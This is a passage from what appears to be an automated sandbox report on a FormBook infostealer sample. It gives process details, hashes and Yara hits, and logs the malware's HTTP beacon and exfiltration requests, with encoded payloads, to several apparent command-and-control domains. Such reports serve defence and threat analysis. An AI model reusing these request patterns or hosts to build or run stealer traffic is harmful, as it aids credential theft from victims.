                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.cssa.auction
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.cssa.auction/rjvg/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:23:19.915699959 CET | 992 | IN | HTTP/1.1 301 Moved Permanently
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 795
                                                                  date: Sat, 11 Jan 2025 00:23:19 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.cssa.auction/rjvg/
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  28 | 192.168.2.5 | 50012 | 107.167.84.42 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:23:21.900738955 CET | 433 | OUT | GET /rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MmyEpVR/4xibFk7xqZoKGfmGxLdx1ruWl0EgkmHv/8jyFg==&rr=BbldmNsp8 HTTP/1.1
                                                                  Host: www.cssa.auction
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:23:22.454224110 CET | 1144 | IN | HTTP/1.1 301 Moved Permanently
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 795
                                                                  date: Sat, 11 Jan 2025 00:23:22 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.cssa.auction/rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MmyEpVR/4xibFk7xqZoKGfmGxLdx1ruWl0EgkmHv/8jyFg==&rr=BbldmNsp8
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  29 | 192.168.2.5 | 50013 | 209.74.77.109 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:23:27.510284901 CET | 698 | OUT | POST /4r26/ HTTP/1.1
                                                                  Host: www.moviebuff.info
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.moviebuff.info
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.moviebuff.info/4r26/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8=3PGUoE7TzLvmU5ArY/GSB4suTAff+DdgAyY8aDJYBduWt0SsZiobaOFiBa5tfrKAB2m04Fra9NqcqjCU2JlpSaEkEQWWVBDaA/JBl0Pl6IS9VutfhBUqHCJ2wWN+LJrrgO1eo6jlPTt+BpU1Y3fc32PyR6beQoM26182f6q2Azc3pNhILtTYRZ6ePSp6aZ08MuXi4VQ=
                                                                  Jan 11, 2025 01:23:28.090332985 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Sat, 11 Jan 2025 00:23:27 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  30 | 192.168.2.5 | 50014 | 209.74.77.109 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:23:30.067981958 CET | 718 | OUT | POST /4r26/ HTTP/1.1
                                                                  Host: www.moviebuff.info
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.moviebuff.info
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.moviebuff.info/4r26/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8=3PGUoE7TzLvmWYwrLoSSVosvPwffxjdkAyU8aBkHd/6WtUCsYnEbdOFiK65kbrK1B2ij4EXa9Nucqm+U3+5oIqEmNwWYIxDaA/JBl0yK6Iq9Ve9fz1gtKiJ142N+c5rvgO18o7OwPRl+BrM1Zlnd+2P8MqbLcKhi4EspfYz8f1sqo7QiRPbwC5WmfBhNLpVVWNHSmCEEuOl5W1JOYkynPNo+qE2X
                                                                  Jan 11, 2025 01:23:30.651897907 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Sat, 11 Jan 2025 00:23:30 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  31 | 192.168.2.5 | 50015 | 209.74.77.109 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:23:32.615881920 CET | 1735 | OUT | POST /4r26/ HTTP/1.1
                                                                  Host: www.moviebuff.info
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.moviebuff.info
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.moviebuff.info/4r26/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:23:33.179502010 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Sat, 11 Jan 2025 00:23:33 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  32 | 192.168.2.5 | 50016 | 209.74.77.109 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:23:35.165673971 CET | 435 | OUT | GET /4r26/?e6sH8=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80etZ5Cy+PRwnxMf10/xPOo/zDftN59BIXLil1jV1mDemi+A==&rr=BbldmNsp8 HTTP/1.1
                                                                  Host: www.moviebuff.info
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:23:35.767946959 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Sat, 11 Jan 2025 00:23:35 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  33 | 192.168.2.5 | 50017 | 199.59.243.228 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:23:40.868402004 CET | 698 | OUT | POST /rfcw/ HTTP/1.1
                                                                  Host: www.whisperart.net
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.whisperart.net
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.whisperart.net/rfcw/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8=4B9Qn/Iw/DjIbM1SIwS5GMvSqANTlh9OV1oz2zzPZ1bVpb2CRBv+v5Z0sf+TugN96ZdKFSMIEm1FtPDRxu/VwLd0E00Bd9Jvo4TO/sZH+TnOG6dhXX8QKV9t+Kk4xaou/752+p5a7Eqm7tuzGxJz+tz1dRhfLXohsJ4SarfIOsSRLn0ARb0S6KQEi3dceIJ3ffS1s2s=
                                                                  Jan 11, 2025 01:23:41.311642885 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                  date: Sat, 11 Jan 2025 00:23:41 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1122
                                                                  x-request-id: a92fa98a-86e3-43c4-b0bb-4c4c5993754c
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                  set-cookie: parking_session=a92fa98a-86e3-43c4-b0bb-4c4c5993754c; expires=Sat, 11 Jan 2025 00:38:41 GMT; path=/
                                                                  connection: close
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                  Jan 11, 2025 01:23:41.311676979 CET | 575 | IN |
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTkyZmE5OGEtODZlMy00M2M0LWIwYmItNGM0YzU5OTM3NTRjIiwicGFnZV90aW1lIjoxNzM2NTU1MD


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  34 | 192.168.2.5 | 50018 | 199.59.243.228 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:23:43.421920061 CET | 718 | OUT | POST /rfcw/ HTTP/1.1
                                                                  Host: www.whisperart.net
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.whisperart.net
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.whisperart.net/rfcw/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8=4B9Qn/Iw/DjIatFSJXG5HsvRpANT8x9KV1kz23jfeALVq6GCegv+/pZ0j/+sgAN66YhsFTwIEmxFtK/Rx5DKq7d6dk0HZ9Jvo4TO/sNt+T/OGLthXzITH19s5Kk4mKoq/75Q+sYH7GSm7oSzGAJwndzzQxghL2dSs51beJO3PqTkHxFqL586pq88ykVrP4oeF8CFyh7IH5hqxuGoufD0JBVen8Ug
                                                                  Jan 11, 2025 01:23:43.896306038 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                  date: Sat, 11 Jan 2025 00:23:43 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1122
                                                                  x-request-id: a4521438-97f5-4fd6-867c-6cf170661989
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                  set-cookie: parking_session=a4521438-97f5-4fd6-867c-6cf170661989; expires=Sat, 11 Jan 2025 00:38:43 GMT; path=/
                                                                  connection: close
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                  Jan 11, 2025 01:23:43.896328926 CET | 575 | IN
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTQ1MjE0MzgtOTdmNS00ZmQ2LTg2N2MtNmNmMTcwNjYxOTg5IiwicGFnZV90aW1lIjoxNzM2NTU1MD


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  35 | 192.168.2.5 | 50019 | 199.59.243.228 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:23:45.970124006 CET | 1735 | OUT | POST /rfcw/ HTTP/1.1
                                                                  Host: www.whisperart.net
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.whisperart.net
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.whisperart.net/rfcw/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8= [TRUNCATED]
                                                                  Jan 11, 2025 01:23:46.408795118 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                  date: Sat, 11 Jan 2025 00:23:45 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1122
                                                                  x-request-id: 4981307d-dd96-4233-89f7-e10c5ca781a1
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                  set-cookie: parking_session=4981307d-dd96-4233-89f7-e10c5ca781a1; expires=Sat, 11 Jan 2025 00:38:46 GMT; path=/
                                                                  connection: close
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                  Jan 11, 2025 01:23:46.408843040 CET | 575 | IN
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDk4MTMwN2QtZGQ5Ni00MjMzLTg5ZjctZTEwYzVjYTc4MWExIiwicGFnZV90aW1lIjoxNzM2NTU1MD


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  36 | 192.168.2.5 | 50020 | 199.59.243.228 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:23:48.840531111 CET | 435 | OUT | GET /rfcw/?e6sH8=1DVwkKEghiueIfFcCwDsNrzmsV0jlWV9KBxp6ijGOBnNtam7Kh7d0pIUvfGZjxRQl5JhLEpebxocieWLqaLg87VqMj4zR8JAo57t+O519z31L6J8d3g4D3wlhoIiupxBhw==&rr=BbldmNsp8 HTTP/1.1
                                                                  Host: www.whisperart.net
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:23:49.286252975 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                  date: Sat, 11 Jan 2025 00:23:48 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1486
                                                                  x-request-id: 9f1cc46f-94e9-4653-a8ab-f337d906de6c
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Ywzo104erxEOs6rclKokf6yf/thsm+W5YTR5vT/jxYwrla8NKJFTzLLIeAyvwb3e5B6NokZnvfSuKOBjaQK/CQ==
                                                                  set-cookie: parking_session=9f1cc46f-94e9-4653-a8ab-f337d906de6c; expires=Sat, 11 Jan 2025 00:38:49 GMT; path=/
                                                                  connection: close
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Ywzo104erxEOs6rclKokf6yf/thsm+W5YTR5vT/jxYwrla8NKJFTzLLIeAyvwb3e5B6NokZnvfSuKOBjaQK/CQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                  Jan 11, 2025 01:23:49.286289930 CET | 939 | IN
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWYxY2M0NmYtOTRlOS00NjUzLWE4YWItZjMzN2Q5MDZkZTZjIiwicGFnZV90aW1lIjoxNzM2NTU1MD


                                                                  Target ID:0
                                                                  Start time:19:20:42
                                                                  Start date:10/01/2025
                                                                  Path:C:\Users\user\Desktop\BcF3o0Egke.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\BcF3o0Egke.exe"
                                                                  Imagebase:0x60000
                                                                  File size:1'014'272 bytes
                                                                  MD5 hash:A04F2271AD163C1098D3CA9C311B53D0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:19:20:59
                                                                  Start date:10/01/2025
                                                                  Path:C:\Users\user\Desktop\BcF3o0Egke.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\BcF3o0Egke.exe"
                                                                  Imagebase:0x380000
                                                                  File size:1'014'272 bytes
                                                                  MD5 hash:A04F2271AD163C1098D3CA9C311B53D0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:19:20:59
                                                                  Start date:10/01/2025
                                                                  Path:C:\Users\user\Desktop\BcF3o0Egke.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\BcF3o0Egke.exe"
                                                                  Imagebase:0xa90000
                                                                  File size:1'014'272 bytes
                                                                  MD5 hash:A04F2271AD163C1098D3CA9C311B53D0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2475970970.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2443326901.0000000001970000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:19:21:12
                                                                  Start date:10/01/2025
                                                                  Path:C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe"
                                                                  Imagebase:0x700000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3935959813.0000000003090000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:7
                                                                  Start time:19:21:14
                                                                  Start date:10/01/2025
                                                                  Path:C:\Windows\SysWOW64\regini.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\regini.exe"
